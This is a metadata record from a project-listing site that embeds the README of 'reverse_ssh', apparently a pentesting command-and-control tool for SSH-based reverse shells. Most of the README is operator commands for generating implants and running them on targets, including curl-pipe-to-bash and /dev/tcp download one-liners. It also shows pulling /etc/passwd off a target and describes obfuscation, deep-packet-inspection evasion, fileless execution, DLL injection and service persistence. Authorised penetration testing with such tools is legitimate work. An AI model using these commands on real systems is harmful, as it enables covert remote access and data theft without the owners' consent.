{"id":13575373,"url":"https://github.com/NHAS/reverse_ssh","last_synced_at":"2025-04-04T22:30:51.875Z","repository":{"id":38397774,"uuid":"337936474","full_name":"NHAS/reverse_ssh","owner":"NHAS","description":"SSH based reverse shell ","archived":false,"fork":false,"pushed_at":"2024-04-13T06:17:07.000Z","size":4868,"stargazers_count":815,"open_issues_count":2,"forks_count":114,"subscribers_count":24,"default_branch":"main","last_synced_at":"2024-04-13T22:05:22.574Z","etag":null,"topics":["golang","hacking","pentest","pentesting","proxy","reverse-shell","scp","sftp","shell","ssh","static-binary","tunnel"],"latest_commit_sha":null,"homepage":"","language":"Go","has_issues":true,"has_wiki":null,"has_pages":null,"mirror_url":null,"source_name":null,"license":"bsd-3-clause","status":null,"scm":"git","pull_requests_enabled":true,"icon_url":"https://github.com/NHAS.png","metadata":{"files":{"readme":"README.md","changelog":null,"contributing":null,"funding":".github/FUNDING.yml","license":"LICENSE","code_of_conduct":null,"threat_model":null,"audit":null,"citation":null,"codeowners":null,"security":null,"support":null,"governance":null,"roadmap":null,"authors":null,"dei":null},"funding":{"ko_fi":"nhasmakesthings"}},"created_at":"2021-02-11T05:15:56.000Z","updated_at":"2024-04-16T09:26:37.171Z","dependencies_parsed_at":"2023-01-31T10:30:54.005Z","dependency_job_id":"d37a0cac-b23b-443b-a453-4fa5de2fa202","html_url":"https://github.com/NHAS/reverse_ssh","commit_stats":null,"previous_names":[],"tags_count":53,"template":false,"template_full_name":null,"repository_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NHAS%2Freverse_ssh","tags_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NHAS%2Freverse_ssh/tags","releases_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NHAS%2Freverse_ssh/releases","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/NHAS%2Freverse_ssh/manifests","owner_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners/NHAS","download_url":"https://codeload.github.com/NHAS/reverse_ssh/tar.gz/refs/heads/main","host":{"name":"GitHub","url":"https://github.com","kind":"github","repositories_count":246989745,"owners_count":20865331,"icon_url":"https://github.com/github.png","version":null,"created_at":"2022-05-30T11:31:42.601Z","updated_at":"2022-07-04T15:15:14.044Z","host_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub","repositories_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories","repository_names_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repository_names","owners_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/owners"}},"keywords":["golang","hacking","pentest","pentesting","proxy","reverse-shell","scp","sftp","shell","ssh","static-binary","tunnel"],"created_at":"2024-08-01T15:01:00.418Z","updated_at":"2025-04-04T22:30:51.868Z","avatar_url":"https://github.com/NHAS.png","language":"Go","funding_links":["https://ko-fi.com/nhasmakesthings"],"categories":["Go"],"sub_categories":[],"readme":"# Reverse SSH\n![icon](icons/On_Top_Of_Fv.png) \n(Art credit to https://www.instagram.com/smart.hedgehog.art/)\n\nWant to use SSH for reverse shells? Now you can.\n\n- Manage and connect to reverse shells with native SSH syntax\n- Dynamic, local and remote forwarding\n- Native `SCP` and `SFTP` implementations for retrieving files from your targets\n- Full windows shell\n- Multiple network transports, such as `http`, `websockets`, `tls` and more\n- Mutual client \u0026 server authentication to create high trust control channels\nAnd more!\n\n\n```text\n +----------------+ +---------+\n | | | |\n | | +---------+ RSSH |\n | Reverse | | | Client |\n | SSH server | | | |\n | | | +---------+\n+---------+ | | |\n| | | | |\n| Human | SSH | | SSH | +---------+\n| Client +--------\u003e+ \u003c-----------------+ |\n| | | | | | RSSH |\n+---------+ | | | | Client |\n | | | | |\n | | | +---------+\n | | |\n | | |\n +----------------+ | +---------+\n | | |\n | | RSSH |\n +---------+ Client |\n | |\n +---------+\n```\n\n\n\nhttps://github.com/user-attachments/assets/11dc8d14-59f1-4bdd-9503-b70f8a0d2db1\n\n\n- [Reverse SSH](#reverse-ssh)\n - [TL;DR](#tldr)\n - [Setup](#setup)\n - [Basic Usage](#basic-usage)\n - [Sponsors](#sponsors)\n - [Individuals](#individuals)\n - [Companies](#companies)\n - [Fancy Features](#fancy-features)\n - [Privileges](#privileges)\n - [Automatic connect-back](#automatic-connect-back)\n - [Reverse shell download (client generation and in-built HTTP server)](#reverse-shell-download-client-generation-and-in-built-http-server)\n - [Alternate Transports (HTTP/Websockets/TLS)](#alternate-transports-httpwebsocketstls)\n - [Bash autocomplete](#bash-autocomplete)\n - [Windows DLL Generation](#windows-dll-generation)\n - [SSH Subsystems](#ssh-subsystems)\n - [All](#all)\n - [Linux](#linux)\n - [Windows](#windows)\n - [Windows Service Integration](#windows-service-integration)\n - [Full Windows Shell Support](#full-windows-shell-support)\n - [Webhooks](#webhooks)\n - [Tun (VPN)](#tun-vpn)\n - [Fileless execution (Clients support dynamically downloading executables to execute as shell)](#fileless-execution-clients-support-dynamically-downloading-executables-to-execute-as-shell)\n - [Supported URI Schemes](#supported-uri-schemes)\n- [Help](#help)\n - [Windows and SFTP](#windows-and-sftp)\n - [Server started with `--insecure` still has `Failed to handshake`](#server-started-with---insecure-still-has-failed-to-handshake)\n - [Foreground vs Background](#foreground-vs-background)\n- [Donations, Support, or Giving Back](#donations-support-or-giving-back)\n\n## TL;DR\n\n### Setup\n\nThe docker release is recommended as it includes the right version of golang, and a cross compiler for windows.\n```sh\n# Start the server\ndocker run -p3232:2222 -e EXTERNAL_ADDRESS=\u003cyour.rssh.server.internal\u003e:3232 -e SEED_AUTHORIZED_KEYS=\"$(cat ~/.ssh/id_ed25519.pub)\" -v ./data:/data reversessh/reverse_ssh\n```\n\nor docker compose:\n\n```yaml\nservices:\n reversessh:\n image: reversessh/reverse_ssh\n ports:\n - \"3232:2222\"\n environment:\n - EXTERNAL_ADDRESS=\u003cyour.rssh.server.internal\u003e:3232\n - RSSH_CONSOLE_LABEL=c2.label\n - RSSH_LOG_LEVEL=INFO # DISABLED, INFO, WARNING, ERROR, FATAL\n - SEED_AUTHORIZED_KEYS=${SSH_PUBLIC_KEY}\n volumes:\n - ./data:/data\n```\n\n### Basic Usage\n\n```sh\n# Connect to the server console\nssh your.rssh.server.internal -p 3232\n\n\n# List all server console commands\ncatcher$ help\n\n# Build a new client and host it on the in-built webserver\ncatcher$ link\nhttp://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25\n\n\n# curl or wget this binary to a target system then execute it,\ncurl http://192.168.0.11:3232/4bb55de4d50cc724afbf89cf46f17d25.sh | bash\n\n# then we can then list what clients are connected\ncatcher$ ls\n Targets\n+------------------------------------------+-----------------------------------+\n| IDs | Version |\n+------------------------------------------+-----------------------------------+\n| a0baa1631fe7cfbbfae34eb7a66d46c00d2a161e | SSH-v2.2.3-1-gdf5a3f8-linux_amd64 |\n| fe6c52029e37185e4c7d512edd67a6c7694e2995 | |\n| dummy.machine | |\n| 192.168.0.11:34542 | |\n+------------------------------------------+-----------------------------------+\n```\n\nAll commands support the `-h` flag for giving help.\n\n\nThen typical ssh commands work, just specify your rssh server as a jump host.\n\n```sh\n# Connect to full shell\nssh -J your.rssh.server.internal:3232 dummy.machine\n\n# Start remote forward\nssh -R 1234:localhost:1234 -J your.rssh.server.internal:3232 dummy.machine\n\n# Start dynamic forward\nssh -D 9050 -J your.rssh.server.internal:3232 dummy.machine\n\n# SCP\nscp -J your.rssh.server.internal:3232 dummy.machine:/etc/passwd .\n\n```\n\n## Sponsors \n\nA huge thanks to the following folk for donating to the RSSH project and making all this work possible! \n\n### Individuals\n[chikamobina](https://github.com/chikamobina) for their generous donations! \n[wrighterase (ctrlzero)](https://github.com/wrighterase) for their pull requests and donation! \n\n### Companies\n\n[Carapace](https://carapace.nz/) is a New Zealand based security consultancy with an extremely talented team of folk! \n[\u003cimg src=\"icons/carapace_logo.png\"\u003e](https://carapace.nz/)\n\n\n## Fancy Features\n\n\n### Privileges\nThe RSSH server supports very basic user privileges, where users found in the `data-directory`/`keys` (specified by `--datadir`) folder e.g `data-directory/keys/jim` will be assigned as a \"user\" only able to see clients that are public (found in the authorized_controllee_keys file without an `owners` tag, or an empty `owners` tag) or specifically assigned to them, e.g `owners=\"jim\"`. \n\nThis can be changed at run time via an user sharing access to a client they own with the `access` command, or a server administrator. Defaultly, any public key found in the `authorized_keys` file will be marked as an administrator to retain backwards compatibility.\nAny changes made by the `access` command will not persist server reboot, and this will require editing the `authorized_controllee_keys` file for that specific client. \n\n### Automatic connect-back\n\nThe rssh client allows you to bake in a connect back address.\nBy default the `link` command will bake in the servers external address.\n\nIf you're (for some reason) manually building the binary, you can specify the environment variable `RSSH_HOMESERVER` to bake it into the client:\n\n```sh\n$ RSSH_HOMESERVER=your.rssh.server.internal:3232 make\n\n# Will connect to your.rssh.server.internal:3232, even though no destination is specified\n$ bin/client\n\n# Behaviour is otherwise normal; will connect to the supplied host, e.g example.com:3232\n$ bin/client -d example.com:3232\n```\n\n### Reverse shell download (client generation and in-built HTTP/Raw TCP server)\n\nThe RSSH server can build and host client binaries (`link` command). Which is the preferred method for building and serving clients.\nFor function to work the server must be placed in the project `bin/` folder, as it needs to find the client source.\n\nBy default the `docker` release has this all built properly, and is recommended for use\n\n```sh\nssh your.rssh.server.internal -p 3232\n\ncatcher$ link -h\n\nlink [OPTIONS]\nLink will compile a client and serve the resulting binary on a link which is returned.\nThis requires the web server component has been enabled.\n --fingerprint Set RSSH server fingerprint will default to server public key\n --garble Use garble to obfuscate the binary (requires garble to be installed)\n --goarch Set the target build architecture (default runtime GOARCH)\n --goarm Set the go arm variable (not set by default)\n --goos Set the target build operating system (default runtime GOOS)\n --http Use http polling as the underlying transport\n --https Use https polling as the underlying transport\n --log-level Set default output logging levels, [INFO,WARNING,ERROR,FATAL,DISABLED]\n --lzma Use lzma compression for smaller binary at the cost of overhead at execution (requires upx flag to be set)\n --name Set the link download url/filename (default random characters)\n --no-lib-c Compile client without glibc\n --ntlm-proxy-creds Set NTLM proxy credentials in format DOMAIN\\\\USER:PASS\n --owners Set owners of client, if unset client is public all users. E.g --owners jsmith,ldavidson\n --proxy Set connect proxy address to bake it\n --raw-download Download over raw TCP, outputs bash downloader rather than http\n --shared-object Generate shared object file\n --sni When TLS is in use, set a custom SNI for the client to connect with\n --stdio Use stdin and stdout as transport, will disable logging, destination after stdio:// is ignored\n --tls Use TLS as the underlying transport\n --upx Use upx to compress the final binary (requires upx to be installed)\n --use-kerberos Instruct client to try and use kerberos ticket when using a proxy\n --working-directory Set download/working directory for automatic script (i.e doing curl https://\u003curl\u003e.sh)\n --ws Use plain http websockets as the underlying transport\n --wss Use TLS websockets as the underlying transport\n -C Comment to add as the public key (acts as the name)\n -l List currently active download links\n -o Set owners of client, if unset client is public all users. E.g --owners jsmith,ldavidson\n -r Remove download link\n -s Set homeserver address, defaults to server --external_address if set, or server listen address if not\n\n# Generate a client and serve it on a named link\ncatcher$ link --name test\nhttp://your.rssh.server.internal:3232/test\n\n```\n\nThen you can download it as follows:\n\n```sh\nwget http://your.rssh.server.internal:3232/test\nchmod +x test\n./test\n```\n\nOr you can use raw tcp to download the client binary:\n```sh\nbash -c \"exec 3\u003c\u003e/dev/tcp/your.rssh.server.internal/3232; echo RAWtest\u003e\u00263; cat \u003c\u00263\" \u003e test\n```\nThe format for this is just `RAW` followed by the filename, i.e in this case `test`, rssh can autogenerate this for you with `--raw-download`.\n\nThe RSSH server also supports `.sh`, `.py` and `.ps1` URL path endings which will generate a script you can pipe into an intepreter:\n```sh\ncurl http://your.rssh.server.internal:3232/test.sh | sh\n```\n\n### Alternate Transports (HTTP/Websockets/TLS)\nThe reverse SSH server and client both support multiple transports for when deep packet inspection blocks SSH outbound from a host or network. \nYou can either specify the connect back scheme manually by specifying it as a url in the client. \n\nE.g\n```sh\n./client -d ws://your.rssh.server:3232\n```\n\nOr by baking it in with the `link` command. \n```sh\nssh your.rssh.server -p 3232 link --ws --name test\n```\n\n### Bash autocomplete\n\nThe RSSH server has the `autocomplete` command which integrates nicely with bash so that you can have autocompletions when not using the server console. \nTo install them you simply do:\n\n```sh\nssh your.rssh.server.internal -p 3232 autocomplete --shell-completion your.rssh.server.internal:3232\n```\n\nAnd this will return an autocompletion that can be added to your `.zshrc` or `.bashrc`\n\nE.g\n\n```sh\n_RSSHCLIENTSCOMPLETION()\n{\n local cur=${COMP_WORDS[COMP_CWORD]}\n COMPREPLY=( $(compgen -W \"$(ssh your.rssh.server.internal -p 3232 autocomplete --clients)\" -- $cur) )\n}\n\n_RSSHFUNCTIONSCOMPLETIONS()\n{\n local cur=${COMP_WORDS[COMP_CWORD]}\n COMPREPLY=( $(compgen -W \"$(ssh your.rssh.server.internal -p 3232 help -l)\" -- $cur) )\n}\n\ncomplete -F _RSSHFUNCTIONSCOMPLETIONS ssh your.rssh.server.internal -p 3232 \n\ncomplete -F _RSSHCLIENTSCOMPLETION ssh -J your.rssh.server.internal:3232\n\ncomplete -F _RSSHCLIENTSCOMPLETION ssh your.rssh.server.internal:3232 exec \ncomplete -F _RSSHCLIENTSCOMPLETION ssh your.rssh.server.internal:3232 connect \ncomplete -F _RSSHCLIENTSCOMPLETION ssh your.rssh.server.internal:3232 listen -c \ncomplete -F _RSSHCLIENTSCOMPLETION ssh your.rssh.server.internal:3232 kill \n```\n\nEnabling you to do completions straight from your terminal:\n\n```sh\n# Will give you an option based on what clients are connected\nssh -J your.rssh.server.internal:3232 \u003cTAB\u003e\n```\n\n### Windows DLL Generation\n\nYou can compile the client as a DLL to be loaded with something like [Invoke-ReflectivePEInjection](https://github.com/PowerShellMafia/PowerSploit/blob/master/CodeExecution/Invoke-ReflectivePEInjection.ps1). Which is useful when you want to do fileless injection of the rssh client.\n\nThis will need a cross compiler if you are doing this on linux, use `mingw-w64-gcc`, this is included in the docker release.\n\n```bash\n# Using the link command\ncatcher$ link --goos windows --shared-object --name windows_dll\nhttp://your.rssh.server.internal:3232/windows_dll\n\n# If building manually\nCC=x86_64-w64-mingw32-gcc GOOS=windows RSSH_HOMESERVER=192.168.1.1:2343 make client_dll\n\n```\n\n### SSH Subsystems\n\nThe SSH protocol supports calling subsystems with the `-s` flag. In RSSH this is repurposed to provide special commands for platforms, and `sftp` support.\n\n\n#### All\n`list` Lists avaiable subsystem\n`sftp`: Runs the sftp handler to transfer files\n\n#### Linux\n`setgid`: Attempt to change group\n`setuid`: Attempt to change user\n\n#### Windows\n`service`: Installs or removes the rssh binary as a windows service, requires administrative rights\n\n\ne.g\n\n```sh\n# Install the rssh binary as a service (windows only)\nssh -J your.rssh.server.internal:3232 test-pc.user.test-pc -s service --install\n```\n\n### Windows Service Integration\n\nThe client RSSH binary supports being run within a windows service and wont time out after 10 seconds. This is great for creating persistent management services.\n\n### Full Windows Shell Support\n\nMost reverse shells for windows struggle to generate a shell environment that supports resizing, copying and pasting and all the other features that we're all very fond of.\nThis project uses `conpty` on newer versions of windows, and the `winpty` library (which self unpacks) on older versions. This should mean that almost all versions of windows will net you a nice shell.\n\n### Webhooks\n\nThe RSSH server can send out raw HTTP requests set using the `webhook` command from the terminal interface.\n\nFirst enable a webhook:\n```bash\n$ ssh your.rssh.server.internal -p 3232\ncatcher$ webhook --on http://localhost:8080/\n```\n\nThen disconnect, or connect a client, this will when issue a `POST` request with the following format.\n\n\n```bash\n$ nc -l -p 8080\nPOST /rssh_webhook HTTP/1.1\nHost: localhost:8080\nUser-Agent: Go-http-client/1.1\nContent-Length: 165\nContent-Type: application/json\nAccept-Encoding: gzip\n\n{\"Status\":\"connected\",\"ID\":\"ae92b6535a30566cbae122ebb2a5e754dd58f0ca\",\"IP\":\"[::1]:52608\",\"HostName\":\"user.computer\",\"Timestamp\":\"2022-06-12T12:23:40.626775318+12:00\"}%\n```\n\n\nAs an additional note, please use the `/slack` endpoint if connecting this to discord.\n\n### Tun (VPN)\n\nRSSH and SSH support creating tuntap interfaces that allow you to route traffic and create pseudo-VPN. It does take a bit more setup than just a local or remote forward (`-L`, `-R`), but in this mode you can send UDP and ICMP.\n\nFirst set up a tun (layer 3) device on your local machine.\n```sh\nsudo ip tuntap add dev tun0 mode tun\nsudo ip link set dev tun0 up\n\n# This will defaultly route all non-local network traffic through the tunnel\nsudo ip route add 0.0.0.0/0 dev tun0\n```\n\nInstall a client on a remote machine, this will not work if you have your RSSH client on the same host as your tun device.\n```sh\nssh -J your.rssh.server.internal:3232 user.wombo -w 0:any\n```\n\nThis has some limitations, it is only able to send `UDP`/`TCP`/`ICMP`, and not arbitrary layer 3 protocols. `ICMP` is best effort and may use the remote hosts `ping` tool, as ICMP sockets are privileged on most machines. This also does not support `tap` devices, e.g layer 2 VPN, as this would require administrative access.\n\n### Fileless execution (Clients support dynamically downloading executables to execute as shell)\n\nWhen specifying what executable the rssh binary should run, either when connecting with a full PTY session or raw execution the client supports URI schemes to download offhost executables.\n\nFor example.\n\n```sh\nconnect --shell https://your.host/program \u003crssh_client_id\u003e\nssh -J your.rssh.server:3232 \u003crssh_client_id\u003e https://your.host/program\n```\n\n#### Supported URI Schemes\n\n`http/https`: Pure web downloading\n\n`rssh`: Download via the rssh server\nThe rssh server will serve content from the `downloads` directory in the executables working directory.\n\nBoth of these methods will opportunistically use [memfd](https://man7.org/linux/man-pages/man2/memfd_create.2.html) which will not write any executables to disk.\n\n# Help\n\n## Windows and SFTP\n\nDue to the limitations of SFTP (or rather the library Im using for it). Paths need a little more effort on windows.\n\n```sh\nsftp -r -J your.rssh.server.internal:3232 test-pc.user.test-pc:'/C:/Windows/system32'\n```\n\nNote the `/` before the starting character.\n\n## Server started with `--insecure` still has `Failed to handshake`\n\nIf the client binary was generated with the `link` command this client has the server public key fingerprint baked in by default. If you lose your server private key, the clients will no longer be able to connect.\nYou can also generate clients with `link --fingerprint \u003cfingerprint here\u003e` to specify a fingerprint, there isnt currently a way to disable this as per version 1.0.13.\n\n## Foreground vs Background\n\nBy default, clients will run in the background then the parent process will exit, the child process will be given the parent processes stdout/stderr so you will be able to see output. If you need to debug your client, use the `--foreground` flag.\n\n# Donations, Support, or Giving Back\n\nThe easiest way to give back to the RSSH project is by finding bugs, opening feature requests and word-of-mouth advertising it to people you think will find it useful!\n\nHowever, if you want to give something back to me directly, you can do so either through Kofi or Github Sponsors (under \"Sponsor this Project\" on the right hand side).\nOr donate to me by sending to the either of the following wallets:\n\nMonero (XMR):\n`8A8TRqsBKpMMabvt5RxMhCFWcuCSZqGV5L849XQndZB4bcbgkenH8KWJUXinYbF6ySGBznLsunrd1WA8YNPiejGp3FFfPND`\nBitcoin (BTC):\n`bc1qm9e9sfrm7l7tnq982nrm6khnsfdlay07h0dxfr`\n","project_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FNHAS%2Freverse_ssh","html_url":"https://awesome.ecosyste.ms/projects/github.com%2FNHAS%2Freverse_ssh","lists_url":"https://awesome.ecosyste.ms/api/v1/projects/github.com%2FNHAS%2Freverse_ssh/lists"}